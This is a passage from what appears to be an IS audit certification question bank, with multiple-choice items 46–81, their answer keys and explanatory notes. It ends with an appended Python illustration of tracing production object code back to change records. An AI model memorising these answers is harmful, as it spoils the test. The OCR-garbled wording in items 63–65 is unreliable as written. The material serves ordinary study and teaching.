NOTE: Fidelity insurance covers the loss arising from dishonest or fraudulent acts by employees. Business interruption insurance covers the loss of profit due to the disruption in the operations of an organization. Errors and omissions insurance provides legal liability protection in the event that the professional practitioner commits an act that results in financial loss to a client. Extra expense insurance is designed to cover the extra costs of continuing operations following a disaster/disruption within an organization.

46. An IS auditor reviewing the risk assessment process of an organization should FIRST
A. identify the reasonable threats to the information assets.
B. analyze the technical and organizational vulnerabilities.
C. identify and locate the information assets.
D. evaluate the effect of a potential security breach.
ANSWER: C
NOTE: Identification and ranking of information assets, e.g.
, data criticality, locations of assets, will set the tone or scope of how to assess risk in relation to the organizational value of the asset. Second, the threats facing each of the organization's assets should be analyzed according to their value to the organization. Third, weaknesses should be identified so that controls can be evaluated to determine if they mitigate the weaknesses. Fourth, analyze how these weaknesses, in the absence of existing controls, would impact the organization's information assets.

47. An organization is using an enterprise resource management (ERP) application. Which of the following would be an effective access control?
A. User-level permissions
B. Role-based
C. Fine-grained
D. Discretionary
ANSWER: B
NOTE: Role-based access controls system access by defining roles for a group of users. Users are assigned to the various roles and access is granted based on the user's role. User-level permissions for an ERP system would create a bigger administrative overhead. Fine-grained access control is very difficult to implement and maintain in the context of a large enterprise. Discretionary access control may be configured or modified by the users or data owners, and therefore may create inconsistencies in the access control management.

48. The sender of a public key would be authenticated by a
A. certificate authority.
B. digital signature.
C. digital certificate.
D. registration authority.
ANSWER: C
NOTE: A digital certificate is an electronic document that declares a public key holder is who the holder claims to be. The certificates do handle data authentication as they are used to determine who sent a particular message. A certificate authority issues the digital certificates, and distributes, generates and manages public keys. A digital signature is used to ensure the integrity of the message being sent and solve the nonrepudiation issue of message origination.
The registration authority would perform most of the administrative tasks of a certificate authority, i.e., registration of the users of a digital signature plus authenticating the information that is put in the digital certificate.

49. Which of the following is the MOST reliable form of single factor personal identification?
A. Smart card
B. Password
C. Photo identification
D. Iris scan
ANSWER: D
NOTE: Since no two irises are alike, identification and verification can be done with confidence. There is no guarantee that a smart card is being used by the correct person since it can be shared, stolen or lost and found. Passwords can be shared and, if written down, carry the risk of discovery. Photo IDs can be forged or falsified.

50. A business application system accesses a corporate database using a single ID and password embedded in a program. Which of the following would provide efficient access control over the organization's data?
A. Introduce a secondary authentication method such as card swipe
B. Apply role-based permissions within the application system
C. Have users input the ID and password for each database transaction
D. Set an expiration period for the database password embedded in the program
ANSWER: B
NOTE: When a single ID and password are embedded in a program, the best compensating control would be a sound access control over the application layer and procedures to ensure access to data is granted based on a user's role. The issue is user permissions, not authentication; therefore, adding a stronger authentication does not improve the situation. Having a user input the ID and password for access would provide a better control because a database log would identify the initiator of the activity. However, this may not be efficient because each transaction would require a separate authentication process. It is a good practice to set an expiration date for a password.
However, this might not be practical for an ID automatically logged in from the program. Often, this type of password is set not to expire.

51. Which of the following should be the MOST important consideration when deciding areas of priority for IT governance implementation?
A. Process maturity
B. Performance indicators
C. Business risk
D. Assurance reports
ANSWER: C
NOTE: Priority should be given to those areas which represent a known risk to the enterprise's operations. The level of process maturity, process performance and audit reports will feed into the decision making process. Those areas that represent real risk to the business should be given priority.

52. An IS auditor has been asked to participate in project initiation meetings for a critical project. The IS auditor's MAIN concern should be that the
A. complexity and risks associated with the project have been analyzed.
B. resources required throughout the project have been determined.
C. project deliverables have been identified.
D. a contract for external parties involved in the project has been completed.
ANSWER: A
NOTE: Understanding complexity and risk, and actively managing these throughout a project, are critical to a successful outcome. The other choices, while important during the course of the project, cannot be fully determined at the time the project is initiated, and are often contingent upon the risk and complexity of the project.

53. Which of the following would MOST effectively control the use of universal serial bus (USB) storage devices?
A. Policies that require instant dismissal if such devices are found
B. Software for tracking and managing USB storage devices
C. Administratively disabling the USB port
D.
Searching personnel for USB storage devices at the facility's entrance
ANSWER: B
NOTE: Software for centralized tracking and monitoring would allow a USB usage policy to be applied to each user based on changing business requirements, and would provide for monitoring and reporting exceptions to management. A policy requiring dismissal may result in increased employee attrition, and business requirements would not be properly addressed. Disabling ports would be complex to manage and might not allow for new business needs. Searching of personnel for USB storage devices at the entrance to a facility is not a practical solution since these devices are small and could be easily hidden.

54. When performing a database review, an IS auditor notices that some tables in the database are not normalized. The IS auditor should next
A. recommend that the database be normalized.
B. review the conceptual data model.
C. review the stored procedures.
D. review the justification.
ANSWER: D
NOTE: If the database is not normalized, the IS auditor should review the justification since, in some situations, denormalization is recommended for performance reasons. The IS auditor should not recommend normalizing the database until further investigation takes place. Reviewing the conceptual data model or the stored procedures will not provide information about normalization.

55. Which of the following would be the greatest cause for concern when data are sent over the Internet using the HTTPS protocol?
A. Presence of spyware in one of the ends
B. The use of a traffic sniffing tool
C. The implementation of an RSA-compliant solution
D. A symmetric cryptography is used for transmitting data
ANSWER: A
NOTE: Encryption using secure sockets layer/transport layer security (SSL/TLS) tunnels makes it difficult to intercept data in transit, but when spyware is running on an end user's computer, data are pulled before encryption takes place.
The other choices are related to encrypting the traffic, but the presence of spyware in one of the ends captures the data before encryption takes place.

56. At the completion of a system development project, a postproject review should include which of the following?
A. Assessing risks that may lead to downtime after the production release
B. Identifying lessons learned that may be applicable to future projects
C. Verifying the controls in the delivered system are working
D. Ensuring that test data are deleted
ANSWER: B
NOTE: A project team has something to learn from each and every project. As risk assessment is a key issue for project management, it is important for the organization to accumulate lessons learned and integrate them into future projects. An assessment of potential downtime should be made with the operations group and other specialists before implementing a system. Verifying that controls are working should be covered during the acceptance test phase and possibly, again, in the postimplementation review. Test data should be retained for future regression testing.

57. While reviewing the IT infrastructure, an IS auditor notices that storage resources are continuously being added. The IS auditor should
A. recommend the use of disk mirroring.
B. review the adequacy of offsite storage.
C. review the capacity management process.
D. recommend the use of a compression algorithm.
ANSWER: C
NOTE: Capacity management is the planning and monitoring of computer resources to ensure that available IT resources are used efficiently and effectively. Business criticality must be considered before recommending a disk mirroring solution, and offsite storage is unrelated to the problem. Though data compression may save disk space, it could affect system performance.

58. Which of the following would be MOST important for an IS auditor to verify when conducting a business continuity audit?
A. Data backups are performed on a timely basis
B.
A recovery site is contracted for and available as needed
C. Human safety procedures are in place
D. Insurance coverage is adequate and premiums are current
ANSWER: C
NOTE: The most important piece in any business continuity process is the protection of human life. This takes precedence over all other aspects of the plan.

59. While reviewing sensitive electronic work papers, the IS auditor noticed that they were not encrypted. This could compromise the
A. audit trail of the versioning of the work papers.
B. approval of the audit phases.
C. access rights to the work papers.
D. confidentiality of the work papers.
ANSWER: D
NOTE: Encryption provides confidentiality for the electronic work papers. Audit trails, audit phase approvals and access to the work papers do not, of themselves, affect the confidentiality but are part of the reason for requiring encryption.

60. An IS auditor reviewing an accounts payable system discovers that audit logs are not being reviewed. When this issue is raised with management, the response is that additional controls are not necessary because effective system access controls are in place. The BEST response the auditor can make is to
A. review the integrity of system access controls.
B. accept management's statement that effective access controls are in place.
C. stress the importance of having a system control framework in place.
D. review the background checks of the accounts payable staff.
ANSWER: C
NOTE: Experience has demonstrated that reliance purely on preventive controls is dangerous. Preventive controls may not prove to be as strong as expected, or their effectiveness can deteriorate over time. Evaluating the cost of controls versus the quantum of risk is a valid management concern. However, in a high-risk system a comprehensive control framework is needed. Intelligent design should allow additional detective and corrective controls to be established that don't have high ongoing costs, e.g.
, automated review of logs to highlight suspicious individual transactions or data patterns. Effective access controls are, in themselves, a positive but, for the reasons outlined above, may not sufficiently compensate for other control weaknesses. In this situation the IS auditor needs to be proactive. The IS auditor has a fundamental obligation to point out control weaknesses that give rise to unacceptable risks to the organization and to work with management to have these corrected. Reviewing background checks on accounts payable staff does not provide evidence that fraud will not occur.

61. A firewall is being deployed at a new location. Which of the following is the MOST important factor in ensuring a successful deployment?
A. Reviewing logs frequently
B. Testing and validating the rules
C. Training a local administrator at the new location
D. Sharing firewall administrative duties
ANSWER: B
NOTE: A mistake in the rule set can render a firewall insecure. Therefore, testing and validating the rules is the most important factor in ensuring a successful deployment. A regular review of log files would not start until the deployment has been completed. Training a local administrator may not be necessary if the firewalls are managed from a central location. Having multiple administrators is a good idea, but not the most important.

62. When evaluating the controls of an EDI application, an IS auditor should primarily be concerned with the risk of
A. excessive transaction turnaround time.
B. application interface failure.
C. improper transaction authorization.
D. nonvalidated batch totals.
ANSWER: C
NOTE: Foremost among the risks associated with electronic data interchange (EDI) is improper transaction authorization. Since the interaction with the parties is electronic, there is no inherent authentication. The other choices, although risks, are not as significant.

63.
T he PRIMARY objective of implementing corporate governance by an organizations management is to A. provide strategic direction. B. control business operations.C. align IT with business. D. implement best practices. ANSWER A NOTE Corporate governance is a set of management practices to provide strategic direction, thereby ensuring that goals are achievable, risks are properly addressed and organizational resources are properly utilized. Hence, the primary objective of corporate governance is to provide strategic direction. Based on the strategic direction, business operations are direct and controlled. 64. To determine if unauthorized changes have been made to production enter the BEST audit procedure is to A. xamine the change control system records and trace them forward to object code files. B. review access control permissions operating within the production program libraries. C. examine object code to find instances of changes and trace them back to change control records. D. re view change approved designations established within the change control system. ANSWER C NOTE The procedure of examining object code files to establish instances of code changes and tracing these back to change control system records is a substantive test that nowadays addresses the risk of unauthorized code changes.The other choices are valid procedures to apply in a change control audit but they do not directly address the risk of unauthorized code changes. 65. When reviewing an active project, an IS auditor observed that, because of a drop-off in anticipated benefits and increased costs, the business case was no longer valid. The IS auditor should recommend that the A. project be discontinued. B. business case be updated and possible corrective actions be identified. C. project be returned to the project sponsor for reapproval. D. project be ompleted and the business case be updated later. 
ANSWER: B
NOTE: An IS auditor should not recommend discontinuing or completing the project before reviewing an updated business case. The IS auditor should recommend that the business case be kept current throughout the project since it is a key input to decisions made throughout the life of any project.

66. Which of the following audit techniques would BEST aid an auditor in determining whether there have been unauthorized program changes since the last authorized program update?
A. Test data run
B. Code review
C. Automated code comparison
D. Review of code migration procedures
ANSWER: C
NOTE: An automated code comparison is the process of comparing two versions of the same program to determine whether the two correspond. It is an efficient technique because it is an automated procedure. Test data runs permit the auditor to verify the processing of preselected transactions, but provide no evidence about unexercised portions of a program. Code review is the process of reading program source code listings to determine whether the code contains potential errors or inefficient statements. A code review can be used as a means of code comparison, but it is inefficient. The review of code migration procedures would not detect program changes.

67. Doing which of the following during peak production hours could result in unexpected downtime?
A. Performing data migration or tape backup
B. Performing preventive maintenance on electrical systems
C. Promoting applications from development to the staging environment
D. Replacing a failed power supply in the core router of the data center
ANSWER: B
NOTE: Choices A and C are processing events which may impact performance, but would not cause downtime. Enterprise-class routers have redundant hot-swappable power supplies, so replacing a failed power supply should not be an issue. Preventive maintenance activities should be scheduled for non-peak times of the day, and preferably during a maintenance window time period.
A mishap or incident caused by a maintenance worker could result in unplanned downtime.

68. Which of the following is the MOST robust method for disposing of magnetic media that contains confidential information?
A. Degaussing
B. Defragmenting
C. Erasing
D. Destroying
ANSWER: D
NOTE: Destroying magnetic media is the only way to ensure that confidential information cannot be recovered. Degaussing or demagnetizing is not sufficient to fully erase information from magnetic media. The purpose of defragmentation is to eliminate fragmentation in file systems, and it does not remove information. Erasing or deleting magnetic media does not remove the information; this method simply changes a file's indexing information.

69. The MAIN criterion for determining the severity level of a service disruption incident is
A. cost of recovery.
B. negative public opinion.
C. geographical location.
D. downtime.
ANSWER: D
NOTE: The longer the period of time a client cannot be serviced, the greater the severity of the incident. The cost of recovery could be minimal yet the service downtime could have a major impact. Negative public opinion is a symptom of an incident. Geographic location does not determine the severity of the incident.

70. During the design of a business continuity plan, the business impact analysis (BIA) identifies critical processes and supporting applications. This will PRIMARILY influence the
A. responsibility for maintaining the business continuity plan.
B. criteria for selecting a recovery site provider.
C. recovery strategy.
D. responsibilities of key personnel.
ANSWER: C
NOTE: The most appropriate strategy is selected based on the relative risk level and criticality identified in the business impact analysis (BIA). The other choices are made after the selection or design of the appropriate recovery strategy.

71. What is the lowest level of the IT governance maturity model where an IT balanced scorecard exists?
A. Repeatable but Intuitive
B. Defined
C. Managed and Measurable
D.
Optimized
ANSWER: B
NOTE: Defined (level 3) is the lowest level at which an IT balanced scorecard is defined.

72. During the system testing phase of an application development project, the IS auditor should review the
A. conceptual design specifications.
B. vendor contract.
C. error reports.
D. program change requests.
ANSWER: C
NOTE: Testing is crucial in determining that user requirements have been validated. The IS auditor should be involved in this phase and review error reports for their precision in recognizing erroneous data, and review the procedures for resolving errors. A conceptual design specification is a document prepared during the requirements definition phase. A vendor contract is prepared during a software acquisition process. Program change requests would normally be reviewed as a part of the postimplementation phase.

73. When reviewing procedures for emergency changes to programs, the IS auditor should verify that the procedures
A. allow changes, which will be completed using after-the-fact follow-up.
B. allow undocumented changes directly to the production library.
C. do not allow any emergency changes.
D. allow programmers permanent access to production programs.
ANSWER: A
NOTE: There may be situations where emergency fixes are required to resolve system problems. This involves the use of special logon IDs that grant programmers temporary access to production programs during emergency situations. Emergency changes should be completed using after-the-fact follow-up procedures, which ensure that normal procedures are retroactively applied; otherwise, production may be impacted. Changes made in this fashion should be held in an emergency library from where they can be moved to the production library, following the normal change management process. Programmers should not directly alter the production library, nor should they be allowed permanent access to production programs.

74.
Though management has stated otherwise, an IS auditor has reasons to believe that the organization is using software that is not licensed. In this situation, the IS auditor should
A. include the statement of management in the audit report.
B. identify whether such software is, indeed, being used by the organization.
C. reconfirm with management the usage of the software.
D. discuss the issue with senior management since reporting this could have a negative impact on the organization.
ANSWER: B
NOTE: When there is an indication that an organization might be using unlicensed software, the IS auditor should obtain sufficient evidence before including it in the report. With regard to this matter, representations obtained from management cannot be independently verified. If the organization is using software that is not licensed, the auditor, to maintain objectivity and independence, must include this in the report.

75. Which of the following would be BEST prevented by a raised floor in the computer machine room?
A. Damage of wires around computers and servers
B. A power failure from static electricity
C. Shocks from earthquakes
D. Water flood damage
ANSWER: A
NOTE: The primary reason for having a raised floor is to enable power cables and data cables to be installed underneath the floor. This eliminates the safety and damage risks posed when cables are placed in a spaghetti-like fashion on an open floor. Static electricity should be avoided in the machine room; therefore, measures such as specially manufactured carpet or shoes would be more appropriate for static prevention than a raised floor. Raised floors do not address shocks from earthquakes. To address earthquakes, anti-seismic architecture would be required to establish a quake-resistant structural framework. Computer equipment needs to be protected against water. However, a raised floor would not prevent damage to the machines in the event of overhead water pipe leakage.

76.
The network of an organization has been the victim of several intruders' attacks. Which of the following measures would allow for the early detection of such incidents?
A. Antivirus software
B. Hardening the servers
C. Screening routers
D. Honeypots
ANSWER: D
NOTE: Honeypots can collect data on precursors of attacks. Since they serve no business function, honeypots are hosts that have no authorized users other than the honeypot administrators. All activity directed at them is considered suspicious. Attackers will scan and attack honeypots, giving administrators data on new trends and attack tools, particularly malicious code. However, honeypots are a supplement to, not a replacement for, properly securing networks, systems and applications. If honeypots are to be used by an organization, qualified incident handlers and intrusion detection analysts should manage them. The other choices do not provide indications of potential attacks.

77. The purpose of a deadman door controlling access to a computer facility is primarily to
A. prevent piggybacking.
B. prevent toxic gases from entering the data center.
C. starve a fire of oxygen.
D. prevent an overly rapid entry to, or exit from, the facility.
ANSWER: A
NOTE: The purpose of a deadman door controlling access to a computer facility is primarily to prevent piggybacking. Choices B and C could be accomplished with a single self-closing door. Choice D is invalid, as a rapid exit may be necessary in some circumstances, e.g., a fire.

78. The MOST important reason for an IS auditor to obtain sufficient and appropriate audit evidence is to
A. comply with regulatory requirements.
B. provide a basis for drawing reasonable conclusions.
C. ensure complete audit coverage.
D. perform the audit according to the defined scope.
ANSWER: B
NOTE: The scope of an IS audit is defined by its objectives. This involves identifying control weaknesses relevant to the scope of the audit.
Obtaining sufficient and appropriate evidence assists the auditor in not only identifying control weaknesses but also documenting and validating them. Complying with regulatory requirements, ensuring coverage and the execution of the audit are all relevant to an audit but are not the reason why sufficient and relevant evidence is required.

79. During the audit of a database server, which of the following would be considered the GREATEST exposure?
A. The password does not expire on the administrator account
B. Default global security settings for the database remain unaltered
C. Old data have not been purged
D. Database activity is not fully logged
ANSWER: B
NOTE: Default security settings for the database could allow issues like blank user passwords or passwords that are the same as the username. Logging all database activity is not practical. Failure to purge old data may present a performance issue but is not an immediate security concern. Choice A is an exposure but not as serious as B.

80. An IS auditor finds that a DBA has read and write access to production data. The IS auditor should
A. accept the DBA access as a common practice.
B. assess the controls relevant to the DBA function.
C. recommend the immediate revocation of the DBA access to production data.
D. review user access authorizations approved by the DBA.
ANSWER: B
NOTE: It is good practice when finding a potential exposure to look for the best controls. Though granting the database administrator (DBA) access to production data might be a common practice, the IS auditor should evaluate the relevant controls. The DBA should have access on a need-to-know and need-to-do basis; therefore, revocation may remove the access required. The DBA, typically, may need to have access to some production data. Granting user authorizations is the responsibility of the data owner and not the DBA.

81.
What should be the GREATEST concern to an IS auditor when employees use portable media (MP3 players, flash drives)?
A. The copying of sensitive data on them
B. The copying of songs and videos on them
C. The cost of these devices multipl
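As an added example, not part of the original question bank, the substantive test from question 64 (choice C) and the automated comparison from question 66 above, written in Python. It fingerprints each object file in a production program library with SHA-256, traces each fingerprint back to the hash recorded for an approved change, and also runs the forward trace of choice A for contrast. The change control system, the program names, the file contents and the change ids (CHG-1001 and so on) are all constructed for the example; a real audit would read the object files from the library and the approved hashes from the change records.

```python
import hashlib
from typing import Dict, List, NamedTuple, Optional, Tuple


class ChangeRecord(NamedTuple):
    """One approved entry in a hypothetical change control system."""
    change_id: str       # constructed ticket id, not a real one
    program: str         # object code file the change was approved to produce
    approved_hash: str   # SHA-256 of the object code as approved for release


def sha256_hex(data: bytes) -> str:
    """Fingerprint used to decide whether two versions of a program correspond."""
    return hashlib.sha256(data).hexdigest()


# Constructed sample inputs. Real object code would be read from the production
# program library; here short byte strings stand in for the file contents.
PROD_LIBRARY: Dict[str, bytes] = {
    "PAYROLL.obj": b"payroll object code v3",          # matches what CHG-1001 approved
    "LEDGER.obj": b"ledger object code v2 + hotfix",   # differs from what CHG-1002 approved
    "REPORTS.obj": b"reports object code v1",          # no change record at all
}

CHANGE_RECORDS: List[ChangeRecord] = [
    ChangeRecord("CHG-1001", "PAYROLL.obj", sha256_hex(b"payroll object code v3")),
    ChangeRecord("CHG-1002", "LEDGER.obj", sha256_hex(b"ledger object code v2")),
    ChangeRecord("CHG-1003", "BILLING.obj", sha256_hex(b"billing object code v1")),  # never deployed
]


def trace_back_to_change_records(
    prod: Dict[str, bytes], records: List[ChangeRecord]
) -> Dict[str, Tuple[str, Optional[str]]]:
    """Choice C of question 64: start from what is actually in production and
    trace each object file back to an approved change. Returns, per program,
    a status and the change id that explains it (None when nothing does)."""
    approved_by_program: Dict[str, Dict[str, str]] = {}
    for rec in records:
        approved_by_program.setdefault(rec.program, {})[rec.approved_hash] = rec.change_id

    result: Dict[str, Tuple[str, Optional[str]]] = {}
    for name, code in prod.items():
        digest = sha256_hex(code)
        approved = approved_by_program.get(name)
        if approved is None:
            result[name] = ("no_change_record", None)        # code nobody approved
        elif digest in approved:
            result[name] = ("authorized", approved[digest])  # matches an approved release
        else:
            result[name] = ("unauthorized_change", None)     # approved once, changed since
    return result


def trace_forward_from_change_records(
    prod: Dict[str, bytes], records: List[ChangeRecord]
) -> Dict[str, bool]:
    """Choice A of question 64: start from the change records and check whether
    each approved version reached production. It only ever looks at programs
    that have a record, so code without any record is never examined."""
    deployed: Dict[str, bool] = {}
    for rec in records:
        code = prod.get(rec.program)
        deployed[rec.change_id] = code is not None and sha256_hex(code) == rec.approved_hash
    return deployed


def audit_exceptions(prod: Dict[str, bytes], records: List[ChangeRecord]) -> List[str]:
    """Programs the auditor must follow up on: anything not explained by a change record."""
    statuses = trace_back_to_change_records(prod, records)
    return sorted(name for name, (status, _) in statuses.items() if status != "authorized")


if __name__ == "__main__":
    for name, (status, change_id) in trace_back_to_change_records(PROD_LIBRARY, CHANGE_RECORDS).items():
        print(f"{name}: {status}" + (f" ({change_id})" if change_id else ""))
    print("forward trace:", trace_forward_from_change_records(PROD_LIBRARY, CHANGE_RECORDS))
    print("exceptions:", audit_exceptions(PROD_LIBRARY, CHANGE_RECORDS))
```

On the constructed data the back-trace flags LEDGER.obj (its hash matches no approved change) and REPORTS.obj (no change record exists), while the forward trace reports only on the three tickets and never examines REPORTS.obj at all. That gap is why the note to question 64 calls the back-trace from object code the procedure that directly addresses the risk of unauthorized code changes.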
